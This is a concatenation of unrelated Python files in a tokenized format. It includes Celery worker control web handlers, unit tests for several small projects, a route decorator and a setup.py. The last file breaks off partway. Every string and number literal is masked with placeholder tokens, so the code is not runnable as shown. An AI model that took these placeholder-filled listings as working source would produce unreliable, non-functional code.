<s> from __future__ import absolute_import <EOL> import time <EOL> import logging <EOL> import collections <EOL> from tornado import web <EOL> from tornado import gen <EOL> from . . views import BaseHandler <EOL> logger = logging . getLogger ( __name__ ) <EOL> class ControlHandler ( BaseHandler ) : <EOL> INSPECT_METHODS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> worker_cache = collections . defaultdict ( dict ) <EOL> @ gen . coroutine <EOL> def update_cache ( self , workername = None ) : <EOL> yield self . update_workers ( workername = workername , <EOL> app = self . application ) <EOL> @ classmethod <EOL> @ gen . coroutine <EOL> def update_workers ( cls , app , workername = None ) : <EOL> logger . debug ( "<STR_LIT>" , workername or '<STR_LIT:all>' ) <EOL> futures = [ ] <EOL> destination = [ workername ] if workername else None <EOL> timeout = app . options . inspect_timeout / <NUM_LIT> <EOL> inspect = app . capp . control . inspect ( <EOL> timeout = timeout , destination = destination ) <EOL> for method in cls . INSPECT_METHODS : <EOL> futures . append ( app . delay ( getattr ( inspect , method ) ) ) <EOL> results = yield futures <EOL> for i , result in enumerate ( results ) : <EOL> if result is None : <EOL> logger . warning ( "<STR_LIT>" , <EOL> cls . INSPECT_METHODS [ i ] ) <EOL> continue <EOL> for worker , response in result . items ( ) : <EOL> if response is not None : <EOL> info = cls . worker_cache [ worker ] <EOL> info [ cls . INSPECT_METHODS [ i ] ] = response <EOL> info [ '<STR_LIT>' ] = time . time ( ) <EOL> def is_worker ( self , workername ) : <EOL> return workername and workername in self . worker_cache <EOL> def error_reason ( self , workername , response ) : <EOL> "<STR_LIT>" <EOL> for r in response : <EOL> try : <EOL> return r [ workername ] . get ( '<STR_LIT:error>' , '<STR_LIT>' ) <EOL> except KeyError : <EOL> pass <EOL> logger . error ( "<STR_LIT>" , response ) <EOL> return '<STR_LIT>' <EOL> @ classmethod <EOL> def get_active_queue_names ( cls ) : <EOL> queues = set ( [ ] ) <EOL> for worker , info in cls . worker_cache . items ( ) : <EOL> for q in info . get ( '<STR_LIT>' , [ ] ) : <EOL> queues . add ( q [ '<STR_LIT:name>' ] ) <EOL> return queues <EOL> class WorkerShutDown ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , workername ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> logger . info ( "<STR_LIT>" , workername ) <EOL> self . capp . control . broadcast ( '<STR_LIT>' , destination = [ workername ] ) <EOL> self . write ( dict ( message = "<STR_LIT>" ) ) <EOL> class WorkerPoolRestart ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , workername ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> logger . info ( "<STR_LIT>" , workername ) <EOL> response = self . capp . control . broadcast ( <EOL> '<STR_LIT>' , arguments = { '<STR_LIT>' : False } , <EOL> destination = [ workername ] , reply = True ) <EOL> if response and '<STR_LIT>' in response [ <NUM_LIT:0> ] [ workername ] : <EOL> self . write ( dict ( <EOL> message = "<STR_LIT>" % workername ) ) <EOL> else : <EOL> logger . error ( response ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . write ( "<STR_LIT>" % ( <EOL> workername , self . error_reason ( workername , response ) <EOL> ) ) <EOL> class WorkerPoolGrow ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , workername ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> n = self . get_argument ( '<STR_LIT:n>' , default = <NUM_LIT:1> , type = int ) <EOL> logger . info ( "<STR_LIT>" , workername , n ) <EOL> response = self . capp . control . pool_grow ( <EOL> n = n , reply = True , destination = [ workername ] ) <EOL> if response and '<STR_LIT>' in response [ <NUM_LIT:0> ] [ workername ] : <EOL> self . write ( dict ( <EOL> message = "<STR_LIT>" % ( workername , n ) ) ) <EOL> else : <EOL> logger . error ( response ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . write ( "<STR_LIT>" % ( <EOL> workername , self . error_reason ( workername , response ) ) ) <EOL> class WorkerPoolShrink ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , workername ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> n = self . get_argument ( '<STR_LIT:n>' , default = <NUM_LIT:1> , type = int ) <EOL> logger . info ( "<STR_LIT>" , workername , n ) <EOL> response = self . capp . control . pool_shrink ( <EOL> n = n , reply = True , destination = [ workername ] ) <EOL> if response and '<STR_LIT>' in response [ <NUM_LIT:0> ] [ workername ] : <EOL> self . write ( dict ( message = "<STR_LIT>" % ( <EOL> workername , n ) ) ) <EOL> else : <EOL> logger . error ( response ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . write ( "<STR_LIT>" % ( <EOL> workername , self . error_reason ( workername , response ) <EOL> ) ) <EOL> class WorkerPoolAutoscale ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , workername ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> min = self . get_argument ( '<STR_LIT>' , type = int ) <EOL> max = self . get_argument ( '<STR_LIT>' , type = int ) <EOL> logger . info ( "<STR_LIT>" , <EOL> workername , ( min , max ) ) <EOL> response = self . capp . control . broadcast ( <EOL> '<STR_LIT>' , arguments = { '<STR_LIT>' : min , '<STR_LIT>' : max } , <EOL> destination = [ workername ] , reply = True ) <EOL> if response and '<STR_LIT>' in response [ <NUM_LIT:0> ] [ workername ] : <EOL> self . write ( dict ( message = "<STR_LIT>" <EOL> "<STR_LIT>" % ( <EOL> workername , min , max ) ) ) <EOL> else : <EOL> logger . error ( response ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . write ( "<STR_LIT>" % ( <EOL> workername , self . error_reason ( workername , response ) <EOL> ) ) <EOL> class WorkerQueueAddConsumer ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , workername ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> queue = self . get_argument ( '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" , <EOL> queue , workername ) <EOL> response = self . capp . control . broadcast ( <EOL> '<STR_LIT>' , arguments = { '<STR_LIT>' : queue } , <EOL> destination = [ workername ] , reply = True ) <EOL> if response and '<STR_LIT>' in response [ <NUM_LIT:0> ] [ workername ] : <EOL> self . write ( dict ( message = response [ <NUM_LIT:0> ] [ workername ] [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> logger . error ( response ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . write ( "<STR_LIT>" % ( <EOL> queue , workername , self . error_reason ( workername , response ) <EOL> ) ) <EOL> class WorkerQueueCancelConsumer ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , workername ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> queue = self . get_argument ( '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" , <EOL> queue , workername ) <EOL> response = self . capp . control . broadcast ( <EOL> '<STR_LIT>' , arguments = { '<STR_LIT>' : queue } , <EOL> destination = [ workername ] , reply = True ) <EOL> if response and '<STR_LIT>' in response [ <NUM_LIT:0> ] [ workername ] : <EOL> self . write ( dict ( message = response [ <NUM_LIT:0> ] [ workername ] [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> logger . error ( response ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . write ( <EOL> "<STR_LIT>" % ( <EOL> queue , workername , self . error_reason ( workername , response ) <EOL> ) ) <EOL> class TaskRevoke ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , taskid ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" , taskid ) <EOL> terminate = self . get_argument ( '<STR_LIT>' , default = False , type = bool ) <EOL> self . capp . control . revoke ( taskid , terminate = terminate ) <EOL> self . write ( dict ( message = "<STR_LIT>" % taskid ) ) <EOL> class TaskTimout ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , taskname ) : <EOL> """<STR_LIT>""" <EOL> workername = self . get_argument ( '<STR_LIT>' ) <EOL> hard = self . get_argument ( '<STR_LIT>' , default = None , type = float ) <EOL> soft = self . get_argument ( '<STR_LIT>' , default = None , type = float ) <EOL> if taskname not in self . capp . tasks : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % taskname ) <EOL> if workername is not None and not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> logger . info ( "<STR_LIT>" , <EOL> taskname , soft , hard ) <EOL> destination = [ workername ] if workername is not None else None <EOL> response = self . capp . control . time_limit ( <EOL> taskname , reply = True , hard = hard , soft = soft , <EOL> destination = destination ) <EOL> if response and '<STR_LIT>' in response [ <NUM_LIT:0> ] [ workername ] : <EOL> self . write ( dict ( message = response [ <NUM_LIT:0> ] [ workername ] [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> logger . error ( response ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . write ( "<STR_LIT>" % <EOL> self . error_reason ( taskname , response ) ) <EOL> class TaskRateLimit ( ControlHandler ) : <EOL> @ web . authenticated <EOL> def post ( self , taskname ) : <EOL> """<STR_LIT>""" <EOL> workername = self . get_argument ( '<STR_LIT>' ) <EOL> ratelimit = self . get_argument ( '<STR_LIT>' ) <EOL> if taskname not in self . capp . tasks : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % taskname ) <EOL> if workername is not None and not self . is_worker ( workername ) : <EOL> raise web . HTTPError ( <NUM_LIT> , "<STR_LIT>" % workername ) <EOL> logger . info ( "<STR_LIT>" , <EOL> ratelimit , taskname ) <EOL> destination = [ workername ] if workername is not None else None <EOL> response = self . capp . control . rate_limit ( <EOL> taskname , ratelimit , reply = True , destination = destination ) <EOL> if response and '<STR_LIT>' in response [ <NUM_LIT:0> ] [ workername ] : <EOL> self . write ( dict ( message = response [ <NUM_LIT:0> ] [ workername ] [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> logger . error ( response ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . write ( "<STR_LIT>" % <EOL> self . error_reason ( taskname , response ) ) </s>
<s> import unittest <EOL> import tornado . testing <EOL> from glob import glob <EOL> def all ( ) : <EOL> test_modules = list ( map ( lambda x : x . rstrip ( '<STR_LIT>' ) . replace ( '<STR_LIT:/>' , '<STR_LIT:.>' ) , <EOL> glob ( '<STR_LIT>' ) + glob ( '<STR_LIT>' ) ) ) <EOL> return unittest . defaultTestLoader . loadTestsFromNames ( test_modules ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> tornado . testing . main ( ) </s>
<s> class route ( object ) : <EOL> """<STR_LIT>""" <EOL> _routes = [ ] <EOL> def __init__ ( self , regexp ) : <EOL> self . _regexp = regexp <EOL> def __call__ ( self , handler ) : <EOL> """<STR_LIT>""" <EOL> self . _routes . append ( ( self . _regexp , handler ) ) <EOL> return handler <EOL> @ classmethod <EOL> def get_routes ( cls ) : <EOL> return cls . _routes </s>
<s> """<STR_LIT>""" <EOL> api_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> service_discovery = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" <EOL> ] <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:type>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:application/json>" <EOL> ] <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:type>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:application/json>" <EOL> ] <EOL> } <EOL> ] <EOL> } <EOL> service_types = [ <EOL> { <EOL> "<STR_LIT>" : <NUM_LIT> <NUM_LIT:1> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> { <EOL> "<STR_LIT>" : <NUM_LIT> <NUM_LIT:2> , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" <EOL> } , <EOL> { <EOL> "<STR_LIT>" : <NUM_LIT> <NUM_LIT:3> , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" <EOL> } <EOL> ] <EOL> service_definitions = { <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:code>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT:key>" : <NUM_LIT> , <EOL> "<STR_LIT:name>" : "<STR_LIT>" <EOL> } , <EOL> { <EOL> "<STR_LIT:key>" : <NUM_LIT> , <EOL> "<STR_LIT:name>" : "<STR_LIT>" <EOL> } <EOL> ] <EOL> } <EOL> ] <EOL> } <EOL> } <EOL> srs = [ <EOL> { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> <NUM_LIT:6> , <EOL> "<STR_LIT:description>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:address>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : - <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> <NUM_LIT:6> , <EOL> "<STR_LIT:description>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:address>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : - <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> import pytest <EOL> from rtv . page import Page , PageController , logged_in <EOL> try : <EOL> from unittest import mock <EOL> except ImportError : <EOL> import mock <EOL> def test_page_logged_in ( terminal ) : <EOL> page = mock . MagicMock ( ) <EOL> page . term = terminal <EOL> @ logged_in <EOL> def func ( _ ) : <EOL> raise RuntimeError ( ) <EOL> page . reddit . is_oauth_session . return_value = True <EOL> with pytest . raises ( RuntimeError ) : <EOL> func ( page ) <EOL> message = '<STR_LIT>' . encode ( '<STR_LIT:utf-8>' ) <EOL> with pytest . raises ( AssertionError ) : <EOL> terminal . stdscr . subwin . addstr . assert_called_with ( <NUM_LIT:1> , <NUM_LIT:1> , message ) <EOL> page . reddit . is_oauth_session . return_value = False <EOL> func ( page ) <EOL> message = '<STR_LIT>' . encode ( '<STR_LIT:utf-8>' ) <EOL> terminal . stdscr . subwin . addstr . assert_called_with ( <NUM_LIT:1> , <NUM_LIT:1> , message ) <EOL> def test_page_unauthenticated ( reddit , terminal , config , oauth ) : <EOL> page = Page ( reddit , terminal , config , oauth ) <EOL> page . controller = PageController ( page , keymap = config . keymap ) <EOL> with mock . patch . object ( page , '<STR_LIT>' ) , mock . patch . object ( page , '<STR_LIT:content>' ) , mock . patch . object ( page , '<STR_LIT>' ) , mock . patch . object ( page , '<STR_LIT>' ) : <EOL> def func ( _ ) : <EOL> page . active = False <EOL> with mock . patch . object ( page , '<STR_LIT>' ) : <EOL> page . controller . trigger = mock . MagicMock ( side_effect = func ) <EOL> page . loop ( ) <EOL> assert page . draw . called <EOL> terminal . stdscr . getch . return_value = ord ( '<STR_LIT:y>' ) <EOL> with mock . patch ( '<STR_LIT>' ) as sys_exit : <EOL> page . controller . trigger ( '<STR_LIT:q>' ) <EOL> assert sys_exit . called <EOL> terminal . stdscr . getch . return_value = terminal . ESCAPE <EOL> with mock . patch ( '<STR_LIT>' ) as sys_exit : <EOL> page . controller . trigger ( '<STR_LIT:q>' ) <EOL> assert not sys_exit . called <EOL> terminal . stdscr . getch . return_value = terminal . ESCAPE <EOL> with mock . patch ( '<STR_LIT>' ) as sys_exit : <EOL> page . controller . trigger ( '<STR_LIT>' ) <EOL> assert sys_exit . called <EOL> page . controller . trigger ( '<STR_LIT:?>' ) <EOL> message = '<STR_LIT>' . encode ( '<STR_LIT:utf-8>' ) <EOL> terminal . stdscr . subwin . addstr . assert_any_call ( <NUM_LIT:1> , <NUM_LIT:1> , message ) <EOL> page . controller . trigger ( '<STR_LIT:1>' ) <EOL> page . refresh_content . assert_called_with ( order = '<STR_LIT>' ) <EOL> page . controller . trigger ( '<STR_LIT:2>' ) <EOL> page . refresh_content . assert_called_with ( order = '<STR_LIT>' ) <EOL> page . controller . trigger ( '<STR_LIT:3>' ) <EOL> page . refresh_content . assert_called_with ( order = '<STR_LIT>' ) <EOL> page . controller . trigger ( '<STR_LIT:4>' ) <EOL> page . refresh_content . assert_called_with ( order = '<STR_LIT>' ) <EOL> page . controller . trigger ( '<STR_LIT:5>' ) <EOL> page . refresh_content . assert_called_with ( order = '<STR_LIT>' ) <EOL> logged_in_methods = [ <EOL> '<STR_LIT:a>' , <EOL> '<STR_LIT:z>' , <EOL> '<STR_LIT:d>' , <EOL> '<STR_LIT:e>' , <EOL> '<STR_LIT:i>' , <EOL> ] <EOL> for ch in logged_in_methods : <EOL> page . controller . trigger ( ch ) <EOL> message = '<STR_LIT>' . encode ( '<STR_LIT:utf-8>' ) <EOL> terminal . stdscr . subwin . addstr . assert_called_with ( <NUM_LIT:1> , <NUM_LIT:1> , message ) <EOL> terminal . stdscr . subwin . addstr . reset_mock ( ) <EOL> def test_page_authenticated ( reddit , terminal , config , oauth , refresh_token ) : <EOL> page = Page ( reddit , terminal , config , oauth ) <EOL> page . controller = PageController ( page , keymap = config . keymap ) <EOL> config . refresh_token = refresh_token <EOL> page . controller . trigger ( '<STR_LIT:u>' ) <EOL> assert reddit . is_oauth_session ( ) <EOL> page . controller . trigger ( '<STR_LIT:i>' ) <EOL> reddit . get_unread = mock . Mock ( return_value = [ ] ) <EOL> page . controller . trigger ( '<STR_LIT:i>' ) <EOL> message = '<STR_LIT>' . encode ( '<STR_LIT:utf-8>' ) <EOL> terminal . stdscr . subwin . addstr . assert_called_with ( <NUM_LIT:1> , <NUM_LIT:1> , message ) <EOL> terminal . stdscr . getch . return_value = ord ( '<STR_LIT:y>' ) <EOL> page . controller . trigger ( '<STR_LIT:u>' ) <EOL> assert not reddit . is_oauth_session ( ) </s>
<s> from __future__ import absolute_import , division , with_statement <EOL> from fudge import patch <EOL> from revolver import git <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_revparse ( local ) : <EOL> cmd = "<STR_LIT>" <EOL> local . expects_call ( ) . with_args ( cmd , capture = True ) . returns ( "<STR_LIT:bar>" ) <EOL> assert git . revparse ( "<STR_LIT:foo>" ) == "<STR_LIT:bar>" <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_repository_name ( local ) : <EOL> cmd = "<STR_LIT>" <EOL> local . expects_call ( ) . with_args ( cmd , capture = True ) . returns ( "<STR_LIT:bar>" ) <EOL> assert git . repository_name ( ) == "<STR_LIT:bar>" <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_repository_name_without_trailing_git ( local ) : <EOL> local . expects_call ( ) . returns ( "<STR_LIT>" ) <EOL> assert git . repository_name ( ) == "<STR_LIT:bar>" <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_repository_name_without_leading_directories ( local ) : <EOL> local . expects_call ( ) . returns ( "<STR_LIT>" ) <EOL> assert git . repository_name ( ) == "<STR_LIT:bar>" <EOL> @ patch ( "<STR_LIT>" ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_archive ( temp_local , local ) : <EOL> temp_local . expects_call ( ) . returns ( "<STR_LIT>" ) <EOL> cmd = "<STR_LIT>" <EOL> local . expects_call ( ) . with_args ( cmd ) <EOL> assert git . create_archive ( "<STR_LIT:foo>" ) </s>
<s> from __future__ import absolute_import , division , with_statement <EOL> from revolver import command , package <EOL> from revolver . core import run <EOL> def install ( ) : <EOL> package . ensure ( "<STR_LIT>" ) <EOL> if not command . exists ( "<STR_LIT>" ) : <EOL> url = "<STR_LIT>" + "<STR_LIT>" <EOL> run ( "<STR_LIT>" % url ) <EOL> else : <EOL> run ( "<STR_LIT>" ) <EOL> def ensure ( ) : <EOL> if not command . exists ( "<STR_LIT>" ) : <EOL> install ( ) </s>
<s> from django . conf import settings <EOL> from balancer . routers import RandomRouter <EOL> from . import BalancerTestCase <EOL> class RandomRouterTestCase ( BalancerTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( RandomRouterTestCase , self ) . setUp ( ) <EOL> self . router = RandomRouter ( ) <EOL> def test_random_db_selection ( self ) : <EOL> """<STR_LIT>""" <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> self . assertTrue ( self . router . get_random_db ( ) in <EOL> settings . DATABASE_POOL . keys ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_relations ( self ) : <EOL> """<STR_LIT>""" <EOL> self . obj1 . _state . db = '<STR_LIT:default>' <EOL> self . obj2 . _state . db = '<STR_LIT>' <EOL> self . assertTrue ( self . router . allow_relation ( self . obj1 , self . obj2 ) ) <EOL> self . obj1 . _state . db = '<STR_LIT>' <EOL> self . obj2 . _state . db = '<STR_LIT>' <EOL> self . assertFalse ( self . router . allow_relation ( self . obj1 , self . obj2 ) ) </s>
<s> from . compat import basestring , numeric_types <EOL> def _split_params_and_files ( params_ ) : <EOL> params = { } <EOL> files = { } <EOL> for k , v in params_ . items ( ) : <EOL> if hasattr ( v , '<STR_LIT>' ) and callable ( v . read ) : <EOL> files [ k ] = v <EOL> elif isinstance ( v , basestring ) or isinstance ( v , numeric_types ) : <EOL> params [ k ] = v <EOL> elif isinstance ( v , bool ) : <EOL> params [ k ] = '<STR_LIT:true>' if v else '<STR_LIT:false>' <EOL> return params , files </s>
<s> from click . testing import CliRunner <EOL> from changes import changelog , cli <EOL> from . import context , setup , teardown <EOL> def test_write_new_changelog ( ) : <EOL> content = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> with open ( context . tmp_file , '<STR_LIT:w>' ) as existing_file : <EOL> existing_file . writelines ( content ) <EOL> changelog . write_new_changelog ( '<STR_LIT>' , context . tmp_file , '<STR_LIT>' ) <EOL> assert '<STR_LIT>' . join ( content ) == '<STR_LIT>' . join ( open ( context . tmp_file ) . readlines ( ) ) <EOL> with open ( context . tmp_file , '<STR_LIT:w>' ) as existing_file : <EOL> existing_file . writelines ( content ) <EOL> changelog . write_new_changelog ( <EOL> '<STR_LIT>' , <EOL> context . tmp_file , <EOL> '<STR_LIT>' , <EOL> dry_run = False <EOL> ) <EOL> expected_content = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> assert '<STR_LIT>' . join ( expected_content ) == '<STR_LIT>' . join ( open ( context . tmp_file ) . readlines ( ) ) <EOL> def test_replace_sha_with_commit_link ( ) : <EOL> repo_url = '<STR_LIT>' <EOL> log = '<STR_LIT>' <EOL> expected_content = [ <EOL> '<STR_LIT>' <EOL> ] <EOL> assert expected_content == changelog . replace_sha_with_commit_link ( repo_url , log ) <EOL> def test_generate_changelog ( ) : <EOL> changelog . generate_changelog ( context ) <EOL> assert isinstance ( context . changelog_content , list ) </s>
<s> try : <EOL> from setuptools import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> scripts = [ ] , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> install_requires = [ '<STR_LIT>' ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> import unittest <EOL> from hashlib import md5 as basic_md5 <EOL> from flask import Flask <EOL> from flask_httpauth import HTTPDigestAuth <EOL> from werkzeug . http import parse_dict_header <EOL> def md5 ( str ) : <EOL> if type ( str ) . __name__ == '<STR_LIT:str>' : <EOL> str = str . encode ( '<STR_LIT:utf-8>' ) <EOL> return basic_md5 ( str ) <EOL> def get_ha1 ( user , pw , realm ) : <EOL> a1 = user + "<STR_LIT::>" + realm + "<STR_LIT::>" + pw <EOL> return md5 ( a1 ) . hexdigest ( ) <EOL> class HTTPAuthTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> app = Flask ( __name__ ) <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> digest_auth_ha1_pw = HTTPDigestAuth ( use_ha1_pw = True ) <EOL> @ digest_auth_ha1_pw . get_password <EOL> def get_digest_password ( username ) : <EOL> if username == '<STR_LIT>' : <EOL> return get_ha1 ( username , '<STR_LIT:hello>' , digest_auth_ha1_pw . realm ) <EOL> elif username == '<STR_LIT>' : <EOL> return get_ha1 ( username , '<STR_LIT>' , digest_auth_ha1_pw . realm ) <EOL> else : <EOL> return None <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> return '<STR_LIT:index>' <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ digest_auth_ha1_pw . login_required <EOL> def digest_auth_ha1_pw_route ( ) : <EOL> return '<STR_LIT>' + digest_auth_ha1_pw . username ( ) <EOL> self . app = app <EOL> self . client = app . test_client ( ) <EOL> def test_digest_ha1_pw_auth_login_valid ( self ) : <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertTrue ( response . status_code == <NUM_LIT> ) <EOL> header = response . headers . get ( '<STR_LIT>' ) <EOL> auth_type , auth_info = header . split 